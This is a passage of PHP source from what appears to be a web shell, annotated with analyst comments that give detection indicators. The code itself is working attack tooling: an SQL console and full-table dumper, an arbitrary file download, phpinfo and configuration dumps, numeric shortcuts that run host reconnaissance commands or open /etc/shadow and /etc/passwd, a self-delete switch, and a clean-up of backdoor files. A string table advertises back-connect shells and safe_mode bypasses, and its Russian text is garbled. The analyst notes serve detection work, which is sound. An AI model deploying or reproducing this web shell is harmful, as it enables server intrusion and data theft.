1202 $this->num_rows=@pg_num_rows($this->res);
1203
1204 $this->num_fields=@pg_num_fields($this->res);
1205
1206 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
1207
1208 @pg_free_result($this->res);
1209
1210 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1211
1212 break;
1213
1214 case 'Oracle':
1215
1216 $this->num_fields=@ocinumcols($this->res);
1217
 // No row-count call here: rows are counted while fetching.
1218 while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
1219
1220 @ocifreestatement($this->res);
1221
1222 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1223
1224 break;
1225
1226 case 'MySQLi':
1227
1228 $this->num_rows=@mysqli_num_rows($this->res);
1229
1230 $this->num_fields=@mysqli_num_fields($this->res);
1231
1232 while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res)));
1233
1234 @mysqli_free_result($this->res);
1235
1236 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1237
1238 break;
1239
1240 case 'mSQL':
1241
1242 $this->num_rows=@msql_num_rows($this->res);
1243
1244 $this->num_fields=@msql_num_fields($this->res);
1245
1246 while(false !== ($this->rows[] = @msql_fetch_array($this->res)));
1247
1248 @msql_free_result($this->res);
1249
1250 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1251
1252 break;
1253
1254 case 'SQLite':
1255
1256 $this->num_rows=@sqlite_num_rows($this->res);
1257
1258 $this->num_fields=@sqlite_num_fields($this->res);
1259
1260 while(false !== ($this->rows[] = @sqlite_fetch_array($this->res)));
1261
1262 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1263
1264 break;
1265
1266 }
1267
1268 return 0;
1269
1270 }
1271
 // Builds a textual SQL dump of one table in $this->dump: a '##' comment header
 // (creation time, database, table), for MySQL the SHOW CREATE TABLE output,
 // then one INSERT statement per row. Returns 1 on success and 0 when $table is
 // empty, the backend is unknown, a query fails or the table has no rows.
 // Analyst note: this is the bulk data-theft path. A "SELECT * FROM <table>"
 // with no WHERE clause issued by the web application's account, followed by a
 // large response or file write, is the pattern to look for. $table is
 // concatenated into the statements as given.
1272 function dump($table)
1273
1274 {
1275
1276 if(empty($table)) return 0;
1277
1278 $this->dump=array();
1279
1280 $this->dump[0] = '##';
1281
1282 $this->dump[1] = '## --------------------------------------- ';
1283
1284 $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
1285
1286 $this->dump[3] = '## Database: '.$this->base;
1287
1288 $this->dump[4] = '## Table: '.$table;
1289
1290 $this->dump[5] = '## --------------------------------------- ';
1291
1292 switch($this->db)
1293
1294 {
1295
1296 case 'MySQL':
1297
1298 $this->dump[0] = '## MySQL dump';
1299
 // query() adds its own /*<NUL>*/ prefix for MySQL, so these statements
 // reach the server carrying that comment twice.
1300 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
1301
1302 if(!$this->get_result()) return 0;
1303
1304 $this->dump[] = $this->rows[0]['Create Table'];
1305
1306 $this->dump[] = '## --------------------------------------- ';
1307
1308 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
1309
1310 if(!$this->get_result()) return 0;
1311
1312 for($i=0;$i<$this->num_rows;$i++)
1313
1314 {
1315
1316 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
1317
1318 $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1319
1320 }
1321
1322 break;
1323
1324 case 'MSSQL':
1325
1326 $this->dump[0] = '## MSSQL dump';
1327
1328 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1329
1330 if(!$this->get_result()) return 0;
1331
1332 for($i=0;$i<$this->num_rows;$i++)
1333
1334 {
1335
1336 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1337
1338 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1339
1340 }
1341
1342 break;
1343
1344 case 'PostgreSQL':
1345
1346 $this->dump[0] = '## PostgreSQL dump';
1347
1348 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1349
1350 if(!$this->get_result()) return 0;
1351
1352 for($i=0;$i<$this->num_rows;$i++)
1353
1354 {
1355
1356 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1357
1358 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1359
1360 }
1361
1362 break;
1363
1364 case 'Oracle':
1365
1366 $this->dump[0] = '## ORACLE dump';
1367
1368 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1369
1370 if(!$this->get_result()) return 0;
1371
1372 for($i=0;$i<$this->num_rows;$i++)
1373
1374 {
1375
1376 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1377
1378 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1379
1380 }
1381
1382 break;
1383
1384 case 'MySQLi':
1385
1386 $this->dump[0] = '## MySQLi dump';
1387
1388 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1389
1390 if(!$this->get_result()) return 0;
1391
1392 for($i=0;$i<$this->num_rows;$i++)
1393
1394 {
1395
1396 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);}
1397
1398 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1399
1400 }
1401
1402 break;
1403
1404 case 'mSQL':
1405
1406 $this->dump[0] = '## mSQL dump';
1407
1408 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1409
1410 if(!$this->get_result()) return 0;
1411
1412 for($i=0;$i<$this->num_rows;$i++)
1413
1414 {
1415
1416 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1417
1418 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1419
1420 }
1421
1422 break;
1423
1424 case 'SQLite':
1425
1426 $this->dump[0] = '## SQLite dump';
1427
1428 if($this->query('SELECT * FROM '.$table)!=1) return 0;
1429
1430 if(!$this->get_result()) return 0;
1431
1432 for($i=0;$i<$this->num_rows;$i++)
1433
1434 {
1435
1436 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
1437
1438 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
1439
1440 }
1441
1442 break;
1443
1444 default:
1445
1446 return 0;
1447
1448 break;
1449
1450 }
1451
1452 return 1;
1453
1454 }
1455
 // Closes the connection of the selected backend; unknown backends are ignored.
1456 function close()
1457
1458 {
1459
1460 switch($this->db)
1461
1462 {
1463
1464 case 'MySQL':
1465
1466 @mysql_close($this->connection);
1467
1468 break;
1469
1470 case 'MSSQL':
1471
1472 @mssql_close($this->connection);
1473
1474 break;
1475
1476 case 'PostgreSQL':
1477
1478 @pg_close($this->connection);
1479
1480 break;
1481
1482 case 'Oracle':
1483
1484 @oci_close($this->connection);
1485
1486 break;
1487
1488 case 'MySQLi':
1489
1490 @mysqli_close($this->connection);
1491
1492 break;
1493
1494 case 'mSQL':
1495
1496 @msql_close($this->connection);
1497
1498 break;
1499
1500 case 'SQLite':
1501
1502 @sqlite_close($this->connection);
1503
1504 break;
1505
1506 }
1507
1508 }
1509
 // Returns the backend's affected-row count for the last statement, or 0 for an
 // unknown backend. Every branch passes $this->res (the result handle) to the
 // extension function.
1510 function affected_rows()
1511
1512 {
1513
1514 switch($this->db)
1515
1516 {
1517
1518 case 'MySQL':
1519
1520 return @mysql_affected_rows($this->res);
1521
1522 break;
1523
1524 case 'MSSQL':
1525
1526 return @mssql_affected_rows($this->res);
1527
1528 break;
1529
1530 case 'PostgreSQL':
1531
1532 return @pg_affected_rows($this->res);
1533
1534 break;
1535
1536 case 'Oracle':
1537
1538 return @ocirowcount($this->res);
1539
1540 break;
1541
1542 case 'MySQLi':
1543
1544 return @mysqli_affected_rows($this->res);
1545
1546 break;
1547
1548 case 'mSQL':
1549
1550 return @msql_affected_rows($this->res);
1551
1552 break;
1553
1554 case 'SQLite':
1555
1556 return @sqlite_changes($this->res);
1557
1558 break;
1559
1560 default:
1561
1562 return 0;
1563
1564 break;
1565
1566 }
1567
1568 }
1569
1570 }
1571
// Request handler: file download. A POST with cmd=download_file and a non-empty
// d_name returns the file at that path as an attachment, read with moreread()
// and, failing that, readzlib(). The optional POST field "compress" is handed
// to compress() ('bzip', 'gzip' or 'zip'). err() is defined elsewhere in the file.
// Analyst note: this is an arbitrary file read limited only by the rights of the
// PHP process. Indicators: POST bodies with the field names cmd, d_name and
// compress, and a "Content-disposition: attachment" response from a script that
// is not one of the application's download endpoints.
1572if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
1573
1574 {
1575
1576 if($file=moreread($_POST['d_name'])){ $filedump = $file; }
1577
 // On failure cmd is blanked so that the send branch below is skipped.
1578 else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }
1579
1580 if(!empty($_POST['cmd']))
1581
1582 {
1583
1584 @ob_clean();
1585
 // Only the base name of the requested path is used for the attachment name.
1586 $filename = @basename($_POST['d_name']);
1587
1588 $content_encoding=$mime_type='';
1589
1590 compress($filename,$filedump,$_POST['compress']);
1591
1592 if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
1593
1594 header("Content-type: ".$mime_type);
1595
1596 header("Content-disposition: attachment; filename=\"".$filename."\";");
1597
1598 echo $filedump;
1599
1600 exit();
1601
1602 }
1603
1604 }
1605
// Request handler: a GET parameter named "1" prints the full phpinfo() report
// (PHP configuration, loaded modules, environment) followed by a BACK link and stops.
// Detection: query strings consisting of a bare numeric parameter name such as
// "?1" on a .php file; this file uses the same scheme for other numbered actions.
1606if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }
1607
// Request handler: SQL console. A POST with cmd=db_query connects with the
// backend, server, port, login, password and database taken from the POST
// fields db, db_server, db_port, mysql_l, mysql_p and mysql_db, splits the
// db_query field on ';' and runs each piece longer than five characters,
// rendering rows or the affected-row count as HTML tables.
// Analyst note: the database credentials travel in every request body and are
// written back into hidden form fields by in() (defined elsewhere in the file),
// so they appear in any full request/response capture. Indicators: POST field
// names mysql_l / mysql_p / mysql_db / db_query, and the default statement text
// "SHOW DATABASES;\nSELECT * FROM user;" pre-filled in the form.
1608if (isset($_POST['cmd']) && $_POST['cmd']=="db_query")
1609
1610 {
1611
1612 echo $head;
1613
1614 $sql = new my_sql();
1615
1616 $sql->db = $_POST['db'];
1617
1618 $sql->host = $_POST['db_server'];
1619
1620 $sql->port = $_POST['db_port'];
1621
1622 $sql->user = $_POST['mysql_l'];
1623
1624 $sql->pass = $_POST['mysql_p'];
1625
1626 $sql->base = $_POST['mysql_db'];
1627
 // Naive statement split: a ';' inside a string literal also splits.
1628 $querys = @explode(';',$_POST['db_query']);
1629
1630 echo '<body bgcolor=#e4e0d8>';
1631
1632 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
1633
1634 else
1635
1636 {
1637
1638 if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
1639
1640 else
1641
1642 {
1643
1644 foreach($querys as $num=>$query)
1645
1646 {
1647
1648 if(strlen($query)>5)
1649
1650 {
1651
1652 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
1653
 // Dispatch on query()'s return code: 0 error, 1 result set, 2 no result set.
1654 switch($sql->query($query))
1655
1656 {
1657
1658 case '0':
1659
1660 echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
1661
1662 break;
1663
1664 case '1':
1665
1666 if($sql->get_result())
1667
1668 {
1669
1670 echo "<table width=100%>";
1671
 // Column names and cell values are HTML-escaped before output.
1672 foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
1673
1674 $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", $sql->columns);
1675
1676 echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
1677
1678 for($i=0;$i<$sql->num_rows;$i++)
1679
1680 {
1681
1682 foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
1683
1684 $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
1685
1686 echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
1687
1688 }
1689
1690 echo "</table>";
1691
1692 }
1693
1694 break;
1695
1696 case '2':
1697
1698 $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
1699
1700 echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
1701
1702 break;
1703
1704 }
1705
1706 }
1707
1708 }
1709
1710 }
1711
1712 }
1713
 // Re-renders the console form with the connection parameters carried over.
1714 echo "<br><form name=form method=POST>";
1715
1716 echo in('hidden','db',0,$_POST['db']);
1717
1718 echo in('hidden','db_server',0,$_POST['db_server']);
1719
1720 echo in('hidden','db_port',0,$_POST['db_port']);
1721
1722 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
1723
1724 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
1725
1726 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
1727
1728 echo in('hidden','cmd',0,'db_query');
1729
1730 echo "<div align=center>";
1731
1732 echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
1733
1734 echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
1735
1736 echo "</form>";
1737
1738 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
1739
1740 }
1741
// Clean-up switches keyed on bare numeric query parameters. Neither branch exits, so the script continues after them.
// ?12: the script deletes its own file. Once it is gone from the web root, reconstruction relies on web server
// access logs (requests carrying the "12" parameter), backups and file-system timelines.
1742if(isset($_GET['12']))
1743
1744 {
1745
1746 @unlink(__FILE__); // "@" suppresses the error message if the delete fails
1747
1748 }
1749
// ?11: removes files the script expects to find in $tempdir ($tempdir is assigned outside this section).
// The names are usable as host indicators when sweeping temp directories:
// bdpl, back, bd, bd.c, dp, dpc, dpc.c, prxpl, grep.txt.
// NOTE(review): the alias commands further down also append to $tempdir.'pass.txt'; that file is not removed
// here, so it can survive this clean-up.
1750if(isset($_GET['11']))
1751
1752 {
1753
1754 @unlink($tempdir.'bdpl');
1755
1756 @unlink($tempdir.'back');
1757
1758 @unlink($tempdir.'bd');
1759
1760 @unlink($tempdir.'bd.c');
1761
1762 @unlink($tempdir.'dp');
1763
1764 @unlink($tempdir.'dpc');
1765
1766 @unlink($tempdir.'dpc.c');
1767
1768 @unlink($tempdir.'prxpl');
1769
1770 @unlink($tempdir.'grep.txt'); // output file of the locate/find aliases defined later in the file
1771
1772 }
1773
1774if(isset($_GET['2']))
1775
1776{
1777
1778echo $head;
1779
/**
 * Turn one configuration value into the HTML fragment shown in a table cell.
 *
 * Anything that loosely equals '' is reported as "no value". That check runs
 * first, so false and null are caught by it and never reach the FALSE / NULL
 * branches below. Objects are cast to arrays, arrays are rendered with
 * print_r(), and the resulting text is escaped and wrapped by U_wordwrap().
 *
 * @param mixed $value value to display
 * @return string HTML fragment
 */
function U_value($value)
{
    if ($value == '') {
        return '<i>no value</i>';
    }

    if (@is_bool($value)) {
        return $value ? 'TRUE' : 'FALSE';
    }

    if ($value === null) {
        return 'NULL';
    }

    $shown = @is_object($value) ? (array) $value : $value;

    if (@is_array($shown)) {
        // Return mode yields the same text the buffered print_r() call produced.
        $shown = print_r($shown, true);
    }

    return U_wordwrap((string) $shown);
}
1809
/**
 * HTML-escape a string and insert a <wbr /> break opportunity every 100
 * characters so long values do not stretch the table.
 *
 * @param string $str raw text
 * @return string escaped text with <wbr /> markers
 */
function U_wordwrap($str)
{
    $escaped = @htmlspecialchars($str);
    $wrapped = @wordwrap($escaped, 100, '<wbr />', true);

    // A break that landed inside an entity (between "&" and ";") is moved to just after the entity.
    return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $wrapped);
}
1819
// Table of every directive ini_get_all() returns, with its local and master value.
// Anyone who can request ?2 therefore sees the complete PHP runtime configuration of the host.
if (@function_exists('ini_get_all')) {
    echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';

    $r = '';
    foreach (@ini_get_all() as $directive => $entry) {
        // One row per directive: name, local value, master value (values pass through U_value()).
        $r .= '<tr><td>' . ws(3) . '<font face=Verdana size=-2><b>' . $directive
            . '</b></font></td><td><font face=Verdana size=-2><div align=center><b>' . U_value($entry['local_value'])
            . '</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>' . U_value($entry['global_value'])
            . '</b></div></font></td></tr>';
    }

    echo $r, '</table>';
}
1841
1842echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
1843
1844die();
1845
1846}
1847
// Handler for ?3: prints a "CPU" table built from the lines of a file named "cpuinfo", then exits.
// NOTE(review): the path is relative, so it resolves against the current working directory and not /proc;
// unless an earlier part of the script changed directory (not visible here), file() fails and only the
// "---" row is printed.
// Host-profiling page only; in access logs it shows up as a request with the bare "3" query parameter.
1848if(isset($_GET['3']))
1849
1850 {
1851
1852 echo $head;
1853
1854 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
1855
1856 $cpuf = @file("cpuinfo"); // array of lines, or false on failure ("@" hides the warning)
1857
1858 if($cpuf)
1859
1860 {
1861
1862 $c = @sizeof($cpuf);
1863
1864 for($i=0;$i<$c;$i++)
1865
1866 {
1867
1868 $info = @explode(":",$cpuf[$i]); // "label : value" pairs; lines without ":" yield a single element
1869
1870 if($info[1]==""){ $info[1]="---"; } // $info[1] is read even when the line had no ":"
1871
1872 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; // $r is not initialised in this block; file content is written out without HTML escaping
1873
1874 }
1875
1876 echo $r;
1877
1878 }
1879
1880 else
1881
1882 {
1883
1884 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
1885
1886 }
1887
1888 echo '</table>';
1889
1890 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; // PHP_SELF is request-derived and is placed in the href unescaped
1891
1892 die();
1893
1894 }
1895
// Handler for ?4: same layout as the ?3 page, titled "MEMORY" and built from a file named "meminfo", then exits.
// NOTE(review): as with "cpuinfo", the relative path resolves against the current working directory, not /proc;
// whether the script changed directory beforehand is not visible in this section.
1896if(isset($_GET['4']))
1897
1898 {
1899
1900 echo $head;
1901
1902 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
1903
1904 $memf = @file("meminfo"); // array of lines, or false on failure ("@" hides the warning)
1905
1906 if($memf)
1907
1908 {
1909
1910 $c = sizeof($memf);
1911
1912 for($i=0;$i<$c;$i++)
1913
1914 {
1915
1916 $info = explode(":",$memf[$i]); // "label : value" pairs; lines without ":" yield a single element
1917
1918 if($info[1]==""){ $info[1]="---"; } // $info[1] is read even when the line had no ":"
1919
1920 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; // $r is not initialised in this block; file content is written out without HTML escaping
1921
1922 }
1923
1924 echo $r;
1925
1926 }
1927
1928 else
1929
1930 {
1931
1932 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
1933
1934 }
1935
1936 echo '</table>';
1937
1938 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; // PHP_SELF is request-derived and is placed in the href unescaped
1939
1940 die();
1941
1942 }
1943
1944
1945
// Numeric shortcut links. Each ?N overwrites $_POST['cmd'] (and $_POST['e_name'] for the edit_file entries),
// so the request reaches the rest of the script as if a form had been submitted. The code that acts on
// $_POST['cmd'] is outside this section.
// The targets fall into two groups: host reconnaissance commands (users, processes, network, disks) and the
// script's edit_file function pointed at files under /etc, including /etc/passwd and /etc/shadow.
// The checks are independent and run in order, so when several keys are sent the last matching assignment wins.
// Detection: GET requests to a single PHP file whose query string is a bare number from this list, and these
// command lines started by the web server account. 'dmesg(8)' and 'cat /etc/*realise' are unusual spellings
// and therefore distinctive in command or audit logs.
1946if(isset($_GET['5']))
1947
1948 {$_POST['cmd'] = 'systeminfo';} // a Windows command; the other entries are Unix commands and paths
1949
1950if(isset($_GET['6']))
1951
1952 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
1953
1954if(isset($_GET['7']))
1955
1956 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
1957
1958if(isset($_GET['8']))
1959
1960 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
1961
1962if(isset($_GET['9']))
1963
1964 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';} // password hashes; only readable if the web server account has that privilege
1965
1966if(isset($_GET['10']))
1967
1968 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
1969
1970if(isset($_GET['13']))
1971
1972 {$_POST['cmd']='cat /proc/cpuinfo';}
1973
1974if(isset($_GET['14']))
1975
1976 {$_POST['cmd']='cat /proc/version';}
1977
1978if(isset($_GET['15']))
1979
1980 {$_POST['cmd'] = 'free';}
1981
1982if(isset($_GET['16']))
1983
1984 {$_POST['cmd'] = 'dmesg(8)';}
1985
1986if(isset($_GET['17']))
1987
1988 {$_POST['cmd'] = 'vmstat';}
1989
1990if(isset($_GET['18']))
1991
1992 {$_POST['cmd'] = 'lspci';}
1993
1994if(isset($_GET['19']))
1995
1996 {$_POST['cmd'] = 'lsdev';}
1997
1998if(isset($_GET['20']))
1999
2000 {$_POST['cmd']='cat /proc/interrupts';}
2001
2002if(isset($_GET['21']))
2003
2004 {$_POST['cmd'] = 'cat /etc/*realise';}
2005
2006if(isset($_GET['22']))
2007
2008 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
2009
2010if(isset($_GET['23']))
2011
2012 {$_POST['cmd'] = 'lsattr -va';}
2013
2014if(isset($_GET['24']))
2015
2016 {$_POST['cmd'] = 'w';}
2017
2018if(isset($_GET['25']))
2019
2020 {$_POST['cmd'] = 'who';}
2021
2022if(isset($_GET['26']))
2023
2024 {$_POST['cmd'] = 'uptime';}
2025
2026if(isset($_GET['27']))
2027
2028 {$_POST['cmd'] = 'last -n 10';}
2029
2030if(isset($_GET['28']))
2031
2032 {$_POST['cmd'] = 'ps -aux';}
2033
2034if(isset($_GET['29']))
2035
2036 {$_POST['cmd'] = 'service --status-all';}
2037
2038if(isset($_GET['30']))
2039
2040 {$_POST['cmd'] = 'ifconfig';}
2041
2042if(isset($_GET['31']))
2043
2044 {$_POST['cmd'] = 'netstat -a';}
2045
2046if(isset($_GET['32']))
2047
2048 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
2049
2050if(isset($_GET['33']))
2051
2052 {$_POST['cmd'] = 'fdisk -l';}
2053
2054if(isset($_GET['34']))
2055
2056 {$_POST['cmd'] = 'df -h';}
2057
2058
2059
2060#if(isset($_GET['']))
2061
2062# {$_POST['cmd'] = '';}
2063
2064
2065
// User-interface string table. Keys have the form <language>_<kind><number>, where <language> is "ru" or "eng"
// and <kind> is butt (button caption), text (label) or err (error message). Which set is displayed presumably
// depends on $language, which the top of the file sets to 'eng' - the lookup itself is outside this section.
// The 'ru_' values in this copy consist of "?" placeholders: the original non-ASCII text did not survive an
// encoding conversion and cannot be recovered from this page.
// For defenders the English labels list the features the script advertises (command execution, bind and
// back-connect shells, safe_mode / open_basedir bypass tests for old PHP releases, FTP and database brute
// force, mail bomber), and their exact spellings (for example 'file contest', 'Max Interation') are stable
// strings for static signatures.
2066$lang=array(
2067
2068'ru_butt1' =>'?????????',
2069
2070'ru_butt2' =>'?????????',
2071
2072'ru_butt3' =>'???????',
2073
2074'ru_butt4' =>'?????????',
2075
2076'ru_butt5' =>'?????????',
2077
2078'ru_butt6' =>'???????',
2079
2080'ru_butt7' =>'???????',
2081
2082'ru_butt8' =>'?????????',
2083
2084'ru_butt9' =>'????',
2085
2086'ru_butt10'=>'?????????',
2087
2088'ru_butt11'=>'?????????????',
2089
2090'ru_butt12'=>'?????',
2091
2092'ru_butt13'=>'???????/???????',
2093
2094'ru_butt14'=>'???????',
2095
2096'ru_butt15'=>'?????????',
2097
2098'ru_text1' =>'??????????? ???????',
2099
2100'ru_text2' =>'?????????? ?????? ?? ???????',
2101
2102'ru_text3' =>'????????? ???????',
2103
2104'ru_text4' =>'??????? ??????????',
2105
2106'ru_text5' =>'???????? ?????? ?? ??????',
2107
2108'ru_text6' =>'????????? ????',
2109
2110'ru_text7' =>'??????',
2111
2112'ru_text8' =>'???????? ?????',
2113
2114'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
2115
2116'ru_text10'=>'??????? ????',
2117
2118'ru_text11'=>'?????? ??? ???????',
2119
2120'ru_text12'=>'back-connect',
2121
2122'ru_text13'=>'IP-?????',
2123
2124'ru_text14'=>'????',
2125
2126'ru_text15'=>'???????? ?????? ? ?????????? ???????',
2127
2128'ru_text16'=>'????????????',
2129
2130'ru_text17'=>'????????? ????',
2131
2132'ru_text18'=>'????????? ????',
2133
2134'ru_text19'=>'Exploits',
2135
2136'ru_text20'=>'????????????',
2137
2138'ru_text21'=>'????? ???',
2139
2140'ru_text22'=>'datapipe',
2141
2142'ru_text23'=>'????????? ????',
2143
2144'ru_text24'=>'????????? ????',
2145
2146'ru_text25'=>'????????? ????',
2147
2148'ru_text26'=>'????????????',
2149
2150'ru_text28'=>'?????? ? safe_mode',
2151
2152'ru_text29'=>'?????? ????????',
2153
2154'ru_text30'=>'???????? ?????',
2155
2156'ru_text31'=>'???? ?? ??????',
2157
2158'ru_text32'=>'?????????? PHP ????',
2159
2160'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL (PHP <= 4.4.2, 5.1.4)',
2161
2162'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
2163
2164'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
2165
2166'ru_text36'=>'???? . ???????',
2167
2168'ru_text37'=>'?????',
2169
2170'ru_text38'=>'??????',
2171
2172'ru_text39'=>'????',
2173
2174'ru_text40'=>'???? ??????? ???? ??????',
2175
2176'ru_text41'=>'????????? ? ?????',
2177
2178'ru_text42'=>'?????????????? ?????',
2179
2180'ru_text43'=>'????????????? ????',
2181
2182'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
2183
2184'ru_text45'=>'???? ????????',
2185
2186'ru_text46'=>'???????? phpinfo()',
2187
2188'ru_text47'=>'???????? ???????? php.ini',
2189
2190'ru_text48'=>'???????? ????????? ??????',
2191
2192'ru_text49'=>'???????? ??????? ? ???????',
2193
2194'ru_text50'=>'?????????? ? ??????????',
2195
2196'ru_text51'=>'?????????? ? ??????',
2197
2198'ru_text52'=>'????? ??? ??????',
2199
2200'ru_text53'=>'?????? ? ?????',
2201
2202'ru_text54'=>'????? ?????? ? ??????',
2203
2204'ru_text55'=>'?????? ? ??????',
2205
2206'ru_text56'=>'?????? ?? ???????',
2207
2208'ru_text57'=>'???????/??????? ????/??????????',
2209
2210'ru_text58'=>'???',
2211
2212'ru_text59'=>'????',
2213
2214'ru_text60'=>'??????????',
2215
2216'ru_text61'=>'???? ??????',
2217
2218'ru_text62'=>'?????????? ???????',
2219
2220'ru_text63'=>'???? ??????',
2221
2222'ru_text64'=>'?????????? ???????',
2223
2224'ru_text65'=>'???????',
2225
2226'ru_text66'=>'???????',
2227
